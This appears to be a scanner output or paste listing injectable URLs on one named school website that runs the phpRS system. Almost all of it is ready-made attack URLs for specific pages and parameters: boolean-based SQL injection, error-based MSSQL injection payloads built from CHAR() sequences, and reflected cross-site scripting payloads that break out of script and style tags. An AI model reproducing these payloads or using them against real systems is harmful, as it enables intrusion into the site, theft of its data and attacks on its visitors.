zsbrectanova.com

1. * Boolean Based SQL Injection
2.  
3. http://www.zsbrectanova.com/phprs/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=-1 OR 17-7=10
4. http://www.zsbrectanova.com/phprs/search.php?rstext=all-phpRS-all&rstema=-1 OR 17-7=10
5.  
6. * [High Possibility] SQL Injection
7.  
8. http://www.zsbrectanova.com/phprs/index.php?strana=%27
9.  
10. http://www.zsbrectanova.com/phprs/gallery.php?akce=galerie_ukaz&galerie_id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
11.  
12. http://www.zsbrectanova.com/phprs/gallery.php?akce=obrazek_ukaz&media_id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
13.  
14.  
15. * XSS
16. http://www.zsbrectanova.com/phprs/search.php?rsvelikost='"--></style></script><script>alert(0x000061)</script>&rstext=all-phpRS-all&rstema=1
17. http://www.zsbrectanova.com/phprs/search.php?kalendarmes='"--></style></script><script>alert(0x000065)</script>&kalendarrok=2011&rsod=2011-07-01
18. http://www.zsbrectanova.com/phprs/search.php?rsvelikost=sab&rstext='"--></style></script><script>alert(0x00006C)</script>&rstema=1
19. http://www.zsbrectanova.com/phprs/search.php?kalendarmes=07&kalendarrok='"--></style></script><script>alert(0x000077)</script>&rsod=2011-07-01
20. http://www.zsbrectanova.com/phprs/view.php?cisloclanku='"--></style></script><script>alert(0x0000E9)</script>
21. http://www.zsbrectanova.com/phprs/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x00010F)</script>
22. http://www.zsbrectanova.com/phprs/download.php?sekce=22'"--></style></script><script>alert(0x000119)</script>
23. http://www.zsbrectanova.com/phprs/download.php?akce=detail&id_detail=240&sekce='"--></style></script><script>alert(0x000139)</script>
24. http://www.zsbrectanova.com/phprs/search.php?rstext='"--></style></script><script>alert(0x000170)</script>&rstema=1
25. http://www.zsbrectanova.com/phprs/gallery.php?akce=galerie_ukaz&galerie_id='"--></style></script><script>alert(0x00018D)</script>